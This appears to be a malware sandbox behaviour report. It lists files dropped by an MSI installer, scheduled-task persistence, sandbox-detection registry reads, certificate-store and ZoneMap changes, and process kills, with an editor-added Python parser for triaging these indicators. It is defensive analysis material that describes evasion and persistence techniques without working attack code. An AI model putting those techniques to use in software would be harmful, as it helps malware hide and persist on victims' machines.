File opened for modification | C:\Windows\Installer\MSIDA26.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIA701.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Installer\MSICB7B.tmp | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | DyzW75Vg9OFYpumqyTL2gvjP.exe
File opened for modification | C:\Windows\Installer\MSICB3C.tmp | msiexec.exe
File created | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | WMIC.exe
File opened for modification | C:\Windows\Installer\MSIC899.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIE917.tmp | msiexec.exe
File created | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe | msiexec.exe
File opened for modification | C:\Windows\Installer\39a2e.msi | msiexec.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\Tasks\fHOlMGNmDutpzGekG.job | schtasks.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
Processes:
WerFault.exe (19 instances)
pid | pid_target | process | target process
4584 | 4916 | WerFault.exe | 2.exe
2804 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
3280 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
4784 | 4968 | WerFault.exe | setup.exe
1016 | 3788 | WerFault.exe | Sun19eb40faaaa9.exe
1260 | 4968 | WerFault.exe | setup.exe
1588 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
1588 | 4968 | WerFault.exe | setup.exe
4684 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
5304 | 4968 | WerFault.exe | setup.exe
5536 | 4968 | WerFault.exe | setup.exe
5696 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
5736 | 4968 | WerFault.exe | setup.exe
5832 | 4968 | WerFault.exe | setup.exe
5324 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
5772 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
5916 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
1892 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
5816 | 1564 | WerFault.exe | Sun19de8ff4b6aefeb8.exe
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Install.exe, wcbafrf, QSydSxCGLaGDRZ1oU1LJVgeo.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Install.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Install.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wcbafrf
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wcbafrf
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | wcbafrf
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Install.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | QSydSxCGLaGDRZ1oU1LJVgeo.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | QSydSxCGLaGDRZ1oU1LJVgeo.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | QSydSxCGLaGDRZ1oU1LJVgeo.exe
-
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
cmd.exe, svchost.exe, Enaxl.exe, firefox.exe, reg.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | cmd.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | cmd.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Enaxl.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | reg.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | reg.exe
-
Creates scheduled task(s) 1 TTPs 27 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe (27 instances)
pid | process
8588, 2916, 8672, 5192, 2204, 8984, 4532, 7852, 7544, 9088, 5236, 1892, 6876, 8932, 408, 6040, 5012, 7788, 7456, 7036, 7416, 7416, 8612, 8764, 5192, 6416, 1340 | schtasks.exe
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exe (3 instances)
pid | process
4676, 5356, 4492 | timeout.exe
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
Install.exe, Install.exe, chrome.exe, chrome.exe, rundll32.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
-
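The behaviour tables in this report arrive as one run-on line per section, which makes it hard to pivot from an artifact to the process that produced it. The Python below is an added example by the editor, not code from the report or from the sandbox that produced it. It parses rows in the report's description / ioc / process form and then answers two triage questions directly from them: which scheduled-task .job files under C:\Windows\Tasks were written, and by what (the persistence the "Creates scheduled task(s)" section only counts), and which processes read the SCSI, CPU and BIOS registry locations that the three registry-check sections above flag as sandbox detection. SAMPLE is a handful of rows copied from this report; the row with no process column and the path that ends in a backslash are included on purpose because both occur in the report. The function names, the EVASION_KEYS substrings and the handling of the trailing "-" section terminator are the example's own assumptions.

```python
"""Parse the report's flattened "description ioc process" rows.

Added example (editor's code, not part of the report or of the sandbox that
produced it). SAMPLE is a handful of rows copied from this report; the
function names and the EVASION_KEYS table are the example's own choices.
"""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Set, Tuple

# The operation labels the report uses in its "description" column.
DESCRIPTIONS = (
    "File opened for modification", "File created",
    "Key value queried", "Key enumerated", "Key created", "Key opened",
    "Key queried", "Set value (str)", "Set value (int)", "Set value (data)",
)
_LABELS = "|".join(re.escape(d) for d in DESCRIPTIONS)
# Zero-width split right before each label (re.split honours empty matches
# from Python 3.7 on).
_SPLIT = re.compile(r"(?=(?:%s)\s)" % _LABELS)
_ROW = re.compile(r"^(%s)\s+(.*)$" % _LABELS, re.S)


class Row(NamedTuple):
    description: str
    ioc: str
    process: str  # "" when the report shows no process for the row


def parse_rows(text: str) -> List[Row]:
    rows: List[Row] = []
    for chunk in _SPLIT.split(text):
        chunk = chunk.strip()
        if chunk.endswith(" -"):          # the report's section terminator
            chunk = chunk[:-2].rstrip()
        m = _ROW.match(chunk)
        if not m:
            continue                      # header words or leading junk
        desc, rest = m.group(1), m.group(2).strip()
        # The process is the last space-separated token; the IoC itself may
        # contain spaces ("Program Files (x86)", "Update Signature").
        ioc, _, proc = rest.rpartition(" ")
        if not ioc:
            ioc, proc = proc, ""          # row with a missing process column
        rows.append(Row(desc, ioc, proc))
    return rows


def scheduled_task_jobs(rows: List[Row]) -> Dict[str, List[Tuple[str, str]]]:
    """*.job files under C:\\Windows\\Tasks -> [(operation, process), ...]."""
    jobs: Dict[str, List[Tuple[str, str]]] = {}
    for r in rows:
        low = r.ioc.lower()
        if low.startswith("c:\\windows\\tasks\\") and low.endswith(".job"):
            jobs.setdefault(r.ioc, []).append((r.description, r.process))
    return jobs


# Registry locations the report flags as sandbox-detection reads (assumed
# substrings, matched case-insensitively against the IoC path).
EVASION_KEYS = {
    "scsi_enum": "\\enum\\scsi",
    "cpu_info": "\\centralprocessor\\",
    "bios_info": "\\description\\system\\bios",
}
_READ_OPS = {"Key opened", "Key queried", "Key enumerated", "Key value queried"}


def evasion_reads(rows: List[Row]) -> Dict[str, Set[str]]:
    """label -> set of processes that read that location (reads only)."""
    hits: Dict[str, Set[str]] = {}
    for r in rows:
        if r.description not in _READ_OPS:
            continue
        low = r.ioc.lower()
        for label, needle in EVASION_KEYS.items():
            if needle in low:
                hits.setdefault(label, set()).add(r.process)
    return hits


def process_summary(rows: List[Row]) -> Counter:
    """Rows per process; rows with no process column are skipped."""
    return Counter(r.process for r in rows if r.process)


# Constructed input: rows copied verbatim from the report's "Drops file in
# Windows directory", "Checks SCSI registry key(s)", "Checks processor
# information in registry" and "Enumerates system info in registry" tables.
SAMPLE = r"""description ioc process File created C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job schtasks.exe File opened for modification C:\Windows\Installer\MSI6590.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri File opened for modification C:\Windows\Tasks\bOoGaaDxESFbryPOAb.job svchost.exe File created C:\Windows\Tasks\PvKMXtxeDKBRRtMew.job WMIC.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Install.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wcbafrf Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Enaxl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -"""

ROWS = parse_rows(SAMPLE)

if __name__ == "__main__":
    for job, ops in scheduled_task_jobs(ROWS).items():
        print(job, ops)
    print(evasion_reads(ROWS))
    print(process_summary(ROWS).most_common(3))
```

The same parser can be fed the Program Files and HKEY_USERS sections unchanged, since they use the same row shape; the two summaries are where the tool stops being generic and starts encoding what this report's sections claim, so extend EVASION_KEYS rather than the parser when a new sandbox-check location turns up.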
Kills process with taskkill 9 IoCs
Processes:
taskkill.exe (9 instances)
pid | process
4536, 7272, 1592, 3288, 3796, 6404, 8264, 8928, 6524 | taskkill.exe
-
Modifies Control Panel 1 IoCs
Processes:
WMIC.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\Colors | WMIC.exe
-
Processes:
WMIC.exe, MicrosoftEdgeCP.exe, IqRhcst.exe, hjKQMrj.exe, browser_broker.exe, schtasks.exe, powershell.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | WMIC.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | IqRhcst.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | IqRhcst.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | hjKQMrj.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | schtasks.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | hjKQMrj.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, wDmspnJ.exe, powershell.exe, reg.exe, svchost.exe, forfiles.exe, schtasks.exe, schtasks.exe, gpscript.exe, powershell.exe, abLzenc.exe, powershell.exe, eCiNxbZ.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | wDmspnJ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | reg.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | forfiles.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | schtasks.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | reg.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | schtasks.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | gpscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | gpscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | schtasks.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | abLzenc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | schtasks.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | schtasks.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\UserChoice\ProgId = "AppX43hnxtbyyps62jhe9sqpdzxn1790zetc" | abLzenc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | schtasks.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | eCiNxbZ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | eCiNxbZ.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
-
Modifies registry class 64 IoCs
Processes:
WMIC.exe, msiexec.exe, MicrosoftEdge.exe, MicrosoftEdge.exe, MicrosoftEdgeCP.exe, rundll32.exe, svchost.exe, MicrosoftEdgeCP.exe, MicrosoftEdgeCP.exe, MicrosoftEdgeCP.exe, MicrosoftEdgeCP.exe, MicrosoftEdgeCP.exe, rundll32.exe, MicrosoftEdgeCP.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | WMIC.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" | msiexec.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "338469730" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus | WMIC.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" | msiexec.exe
Set value (int) | \REGISTRY\US
ER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{386390BC-A767-4E92-8313-8E0A6432EFDC} = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEI2WPE3-XE1H-AE42-701D-DPK87XELRL76} | rundll32.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\7289246C77593EBF\2 = "1" | svchost.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI | WMIC.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" | msiexec.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" | WMIC.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c30480779eafd701 | WMIC.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugeblog.com | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\allhugeblog.com\NumberOfS = "0" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | MicrosoftEdge.exe
